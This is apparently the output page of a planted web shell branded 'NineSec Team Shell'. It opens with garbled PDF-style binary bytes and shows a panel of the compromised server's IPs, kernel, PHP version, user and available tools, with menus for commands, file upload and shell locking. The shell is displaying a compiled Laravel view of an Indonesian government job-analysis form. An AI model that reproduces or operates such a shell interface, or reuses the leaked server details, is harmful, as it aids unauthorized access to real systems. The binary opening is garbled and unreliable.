%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.70.131.203
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0775) :  /proc/16354/cwd/pemprov/storage/framework/views/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //proc/16354/cwd/pemprov/storage/framework/views/4b180236b3d7f3ed199d12522d5965f026d939b6.php
<html>
    <head>
        <title>Analisis Jabatan</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
        <style>
            .tree li a { text-decoration: none; color: black; }
        </style>
    </head>
    <body style="font-family:Arial, Helvetica, sans-serif; margin-left: 5%">
        <div style="text-align:center; text-transform:uppercase; font-size:24; font-weight:bolder; margin-top:20px; margin-bottom: 50px;">Informasi Jabatan <hr></div>
        <div width="100%">
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">1. Nama Jabatan : <?php echo e(strtoupper($data->job->position)); ?></div>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="margin-bottom:5px; text-transform:ucfirst">2. Kode Jabatan : <?php echo e($data->position_code); ?> </div>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="margin-bottom:5px; text-transform:ucfirst; font-weight: bolder ">3. Unit Kerja : <br></div>
                    <table style="margin-left: 13px;">
                        <?php if(!empty($data->eselon_1)): ?>
                            <tr>
                                <td width="200px">Eselon I/ Jabatan Pimpinan Tinggi Madya</td>
                                <td>: <?php echo e($data->eselon_1); ?></td>
                            </tr>
                        <?php endif; ?>
                        <?php if(!empty($data->eselon_2)): ?>
                            <tr>
                                <td width="200px">Eselon IIa/ Jabatan Pimpinan Tinggi Pratama</td>
                                <td>: <?php echo e($data->eselon_2); ?></td>
                            </tr>
                        <?php endif; ?>
                        <?php if(!empty($data->eselon_2b)): ?>
                            <tr>
                                <td width="200px">Eselon IIb/ Jabatan Pimpinan Tinggi Pratama</td>
                                <td>: <?php echo e($data->eselon_2b); ?></td>
                            </tr>
                        <?php endif; ?>
                        <?php if(!empty($data->eselon_3)): ?>
                            <tr>
                                <td width="200px">Eselon III / Jabatan Administrator</td>
                                <td>: <?php echo e($data->eselon_3); ?></td>
                            </tr>
                        <?php endif; ?>
                        <?php if(!empty($data->eselon_4)): ?>
                            <tr>
                                <td width="200px">Eselon IV/ Jabatan Pengawas</td>
                                <td>: <?php echo e($data->eselon_4); ?></td>
                            </tr>
                        <?php endif; ?>
                        <?php if(!empty($data->executor)): ?>
                            <tr>
                                <td width="200px">Jabatan Pelaksana</td>
                                <td>: <?php echo e($data->executor); ?></td>
                            </tr>
                        <?php endif; ?>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="margin-bottom:5px; text-transform:ucfirst; font-weight: bolder">4. Kedudukan Dalam Organisasi </div>
                    <?php if(!empty($structure->first)): ?>  
                        <div class="tree">
                            <ul>
                                <li>
                                <?php if(empty($structure->second)): ?>
                                    <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->first); ?></a>
                                <?php else: ?>
                                    <?php if($structure->first == $data->job->position): ?>
                                        <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->first); ?></a>
                                    <?php else: ?>
                                        <a href="javascript:void(0);"><?php echo e($structure->first); ?></a>
                                    <?php endif; ?>
                                <?php endif; ?>
                                    <?php if(!empty($structure->second)): ?>  
                                        <ul>
                                            <li>
                                            <?php if( (empty($structure->third) && empty($structure->forth))): ?>
                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->second); ?></a>
                                            <?php else: ?>
                                                <?php if($structure->second == $data->job->position): ?>
                                                    <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->second); ?></a>
                                                <?php else: ?>
                                                    <a href="javascript:void(0);"><?php echo e($structure->second); ?></a>
                                                <?php endif; ?>
                                            <?php endif; ?>
                                                <?php if(!empty($structure->third)): ?>  
                                                    <ul>
                                                        <li>
                                                        <?php if(empty($structure->forth)): ?>
                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->third); ?></a>
                                                        <?php else: ?>
                                                            <?php if($structure->third == $data->job->position): ?>
                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->third); ?></a>
                                                            <?php else: ?>
                                                                <a href="javascript:void(0);"><?php echo e($structure->third); ?></a>
                                                            <?php endif; ?>
                                                        <?php endif; ?>
                                                        <?php if(!empty($structure->forth)): ?>
                                                            <ul>
                                                                <?php $forth = explode(",", $structure->forth); ?>
                                                                <?php for($i=0; $i < count($forth); $i++): ?>
                                                                    <li>
                                                                        <?php if($forth[$i] == $data->job->position): ?>
                                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($forth[$i]); ?></a>
                                                                        <?php else: ?>
                                                                            <a href="javascript:void(0);"><?php echo e($forth[$i]); ?></a>
                                                                        <?php endif; ?>
                                                                            <?php if(!empty($structure->fifth)): ?>
                                                                            <ul>
                                                                                <?php $fifth = explode(",", $structure->fifth); ?>
                                                                                <?php for($i=0; $i < count($fifth); $i++): ?>
                                                                                    <li>
                                                                                        <?php if($fifth[$i] == $data->job->position): ?>
                                                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($fifth[$i]); ?></a>
                                                                                        <?php else: ?>
                                                                                            <a href="javascript:void(0);"><?php echo e($fifth[$i]); ?></a>
                                                                                        <?php endif; ?>
                                                                                        <?php if(!empty($structure->sixth)): ?>
                                                                                            <ul>
                                                                                                <?php $sixth = explode(",", $structure->sixth); ?>
                                                                                                <?php for($i=0; $i < count($sixth); $i++): ?>
                                                                                                    <?php if($sixth[$i] == $data->job->position): ?>
                                                                                                        <li>
                                                                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($sixth[$i]); ?></a>
                                                                                                        </li>
                                                                                                    <?php else: ?>
                                                                                                        <li>
                                                                                                            <a href="javascript:void(0);"><?php echo e($sixth[$i]); ?></a>
                                                                                                        </li>
                                                                                                    <?php endif; ?>
                                                                                                <?php endfor; ?>
                                                                                            </ul>
                                                                                        <?php endif; ?>
                                                                                    </li>
                                                                                <?php endfor; ?>
                                                                            </ul>
                                                                        </li>
                                                                    <?php endif; ?>
                                                                <?php endfor; ?>
                                                            </ul>
                                                        <?php endif; ?>
                                                        </li>
                                                    </ul>
                                                <?php else: ?>
                                                    <?php if(!empty($structure->forth)): ?>
                                                        <ul>
                                                            <?php $forth = explode(",", $structure->forth); ?>
                                                            <?php for($i=0; $i < count($forth); $i++): ?>
                                                                <?php if($forth[$i] == $data->job->position): ?>
                                                                    <li>
                                                                        <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($forth[$i]); ?></a>
                                                                    </li>
                                                                <?php else: ?>
                                                                    <li>
                                                                        <a href="javascript:void(0);"><?php echo e($forth[$i]); ?></a>
                                                                        <?php if(!empty($structure->fifth)): ?>
                                                                            <ul>
                                                                                <?php $fifth = explode(",", $structure->fifth); ?>
                                                                                <?php for($i=0; $i < count($fifth); $i++): ?>
                                                                                    <?php if($fifth[$i] == $data->job->position): ?>
                                                                                        <li>
                                                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($fifth[$i]); ?></a>
                                                                                        </li>
                                                                                    <?php else: ?>
                                                                                        <li>
                                                                                            <a href="javascript:void(0);"><?php echo e($fifth[$i]); ?></a>
                                                                                                <?php if(!empty($structure->sixth)): ?>
                                                                                                    <ul>
                                                                                                        <?php $sixth = explode(",", $structure->sixth); ?>
                                                                                                        <?php for($i=0; $i < count($sixth); $i++): ?>
                                                                                                            <?php if($sixth[$i] == $data->job->position): ?>
                                                                                                                <li>
                                                                                                                    <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($sixth[$i]); ?></a>
                                                                                                                </li>
                                                                                                            <?php else: ?>
                                                                                                                <li>
                                                                                                                    <a href="javascript:void(0);"><?php echo e($sixth[$i]); ?></a>
                                                                                                                </li>
                                                                                                            <?php endif; ?>
                                                                                                        <?php endfor; ?>
                                                                                                    </ul>
                                                                                                <?php endif; ?>
                                                                                        </li>
                                                                                    <?php endif; ?>
                                                                                <?php endfor; ?>
                                                                            </ul>
                                                                        <?php endif; ?>
                                                                    </li>
                                                                <?php endif; ?>
                                                            <?php endfor; ?>
                                                        </ul>
                                                    <?php endif; ?>
                                                <?php endif; ?>
                                            </li>
                                        </ul>
                                    <?php endif; ?>
                                </li>
                            </ul>
                        </div>
                    <?php endif; ?>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="margin-bottom:5px; text-transform:ucfirst; text-align: justify; text-justify: inter-word; "><strong>5. Ikhtisar Jabatan </strong> : <?php echo $data->job_title; ?> </div>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">6. Uraian Tugas</div>
                    <?php if($desc): ?>
                        <?php $__currentLoopData = $desc; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <?php if($value->title != "" && $value->description != ""): ?>
                                <div style="margin-bottom:5px"><?php echo e(($key+1)); ?>. <?php echo e($value->title); ?></div> 
                                <div style="font-weight:bolder; margin-left:20px; margin-bottom:5px">Tahapan : </div>
                                <div style="margin-left:30px; margin-bottom:5px"><?php echo $value->description; ?></div>
                            <?php endif; ?>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    <?php endif; ?>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">7. Bahan Kerja</div>
                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Bahan Kerja</th>
                            <th>Penggunaan Dalam Tugas</th>
                        </tr>
                        <tbody>
                            <?php if($material): ?>
                                <?php $__currentLoopData = $material; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <tr>
                                        <td><?php echo e(($key+1)); ?></td>
                                        <td><?php echo e($value->material); ?> <?php echo e($value->material_desc); ?></td>
                                        <td><?php echo e($value->material_use); ?></td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">8. Peralatan / Alat Kerja</div>
                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Perangkat Kerja</th>
                            <th>Digunakan Untuk Tugas</th>
                        </tr>
                        <tbody>
                            <?php if($tool): ?>
                                <?php $__currentLoopData = $tool; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <tr>
                                        <td><?php echo e(($key+1)); ?></td>
                                        <td><?php echo e($value->tool); ?></td>
                                        <td><?php echo e($value->tool_use); ?></td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">9. Hasil Kerja</div>
                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Hasil Kerja <sup>1)</sup></th>
                            <th>Satuan Hasil <sup>2)</sup></th>
                        </tr>
                        <tbody>
                            <?php if($workresult): ?>
                                <?php $__currentLoopData = $workresult; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <tr>
                                        <td><?php echo e(($key+1)); ?></td>
                                        <td><?php echo e($value->results); ?></td>
                                        <td><?php echo e($value->unit_of_results); ?></td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">10. Tanggung Jawab</div>
                    <?php if($responsible): ?>
                        <ol>
                        <?php $__currentLoopData = $responsible; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->responsible); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">11. Wewenang</div>
                    <?php if($authority): ?>
                        <ol>
                        <?php $__currentLoopData = $authority; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->authority); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">12. Korelasi Jabatan</div>
                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Jabatan</th>
                            <th>Unit Kerja/ Instansi</th>
                            <th>Dalam Hal</th>
                        </tr>
                        <tbody>
                            <?php if($correlation): ?>
                                <?php $__currentLoopData = $correlation; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <tr>
                                        <td><?php echo e(($key+1)); ?></td>
                                        <td><?php echo e($value->position); ?></td>
                                        <td><?php echo e($value->organization); ?></td>
                                        <td><?php echo e($value->correlation_use); ?></td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">13. Kondisi Lingkungan Kerja</div>
                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Aspek</th>
                            <th>Faktor</th>
                        </tr>
                        <tbody>
                            <?php if($workenv): ?>
                                <?php $__currentLoopData = $workenv; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <tr>
                                        <td><?php echo e(($key+1)); ?></td>
                                        <td><?php echo e($value->aspect); ?></td>
                                        <td><?php echo e($value->factor); ?></td>
                                    </tr>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom:15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">14. Resiko Bahaya</div>
                    <?php echo $data->risk_of_danger; ?>

                </div>
            </div>
            <div style="margin-bottom:0">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">15. Syarat Jabatan</div>
                    <?php if($termofoffice): ?>
                        <ol style="list-style-type: none; margin-left:0; padding-left:0px">
                        <?php $__currentLoopData = $termofoffice; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <?php if($key == 0): ?>
                                <li tyle="padding: 10px 0;"><strong> a.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?> </li>
                            <?php elseif($key == 1): ?>
                                <li tyle="padding: 10px 0;"><strong> b.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>

                                    <br><strong> c. Kursus / Diklat </strong>  </li>
                            <?php elseif($key == 2 || $key == 3): ?>
                                <div style="margin-left:20px;"><?php echo e($value->term); ?> : <?php echo e($value->description); ?></div>
                            <?php elseif($key == 4): ?>
                                <li tyle="padding: 10px 0;"><strong> d.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>  </li>
                            <?php elseif($key == 5): ?>
                                <li tyle="padding: 10px 0;"><strong> e.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?> </li>
                            <?php elseif($key == 6): ?>
                                <li tyle="padding: 10px 0;"><strong> f.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>  </li>
                            <?php endif; ?>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">g. Bakat Kerja</div>
                    <?php if($talent): ?>
                        <ol>
                        <?php $__currentLoopData = $talent; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->kode); ?> : <?php echo e($value->description); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">h. Tempramen Kerja</div>

                    <?php if($temprament): ?>
                        <ol>
                        <?php $__currentLoopData = $temprament; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->kode); ?> : <?php echo e($value->description); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>

                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">i. Minat Kerja</div>

                    <?php if($interest): ?>
                        <ol>
                        <?php $__currentLoopData = $interest; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->kode); ?> : <?php echo e($value->description); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>

                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">j. Upaya Fisik</div>

                    <?php if($effort): ?>
                        <ol>
                        <?php $__currentLoopData = $effort; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->kode); ?> : <?php echo e($value->description); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>

                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">k. Kondisi Fisik</div>

                    <?php if($condition): ?>
                        <ol>
                        <?php $__currentLoopData = $condition; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->type); ?> : <?php echo e($value->information); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>

                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">l. Fungsi Jabatan</div>

                    <?php if($jobfunction): ?>
                        <ol>
                        <?php $__currentLoopData = $jobfunction; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        </ol>
                    <?php endif; ?>
                </div>
            </div>
            <div style="margin-bottom: 15px">
                <div>
                    <div style="font-weight: bolder; margin-bottom:5px; text-transform:ucfirst ">16. Prestasi Kerja yang diharapkan</div>

                    <table border="1" style="border-spacing:0; width: 100%;" cellpadding="10">
                        <tr style="background-color:#ccc;">
                            <th width="5%">No</th>
                            <th>Satuan Hasil <sup>1</sup></th>
                            <th>Jumlah Hasil (Dalam 1 Tahun)</th>
                            <th>Waktu Penyelesaian <sup>2)</sup></th>
                        </tr>
                        <tbody>
                            <?php if($performance): ?>
                                <?php $__currentLoopData = $performance; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                    <?php if( $value->unit_of_results != "" && $value->number_of_results != "" && $value->time_of_completion != "" ): ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->unit_of_results); ?></td>
                                            <td><?php echo e($value->number_of_results); ?></td>
                                            <td><?php echo e($value->time_of_completion); ?></td>
                                        </tr>
                                    <?php endif; ?>
                                <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            <?php endif; ?>
                        </tbody>
                    </table>
                </div>
            </div>
            <div style="margin-bottom: 15px">
                <div>
                    <div style="font-weight: bolder; text-transform:ucfirst ">17. Butir Informasi Lain : </div>
                    <?php echo $data->information_etc; ?>

                </div>
            </div>
            <div>
                <table width="100%">
                    <tr>
                        <td colspan="2" style="text-align:right"></td>
                    </tr>
                    <tr>
                        <td style="text-align:center">
                            Mengetahui : <br>
                            Atasan Langsung <br><br><br><br><br><br>
                            ........................................................ <br>
                            NIP. ...................................................
                        </td>
                        <td style="text-align:center">
                            Bandung, ................ <br>
                            <br>
                            Yang Membuat <br><br><br><br><br>
                            ........................................................ <br>
                            NIP. ...................................................
                        </td>
                    </tr>
                </table>
            </div>
        </div>
    </body>
</html>

NineSec Team - 2022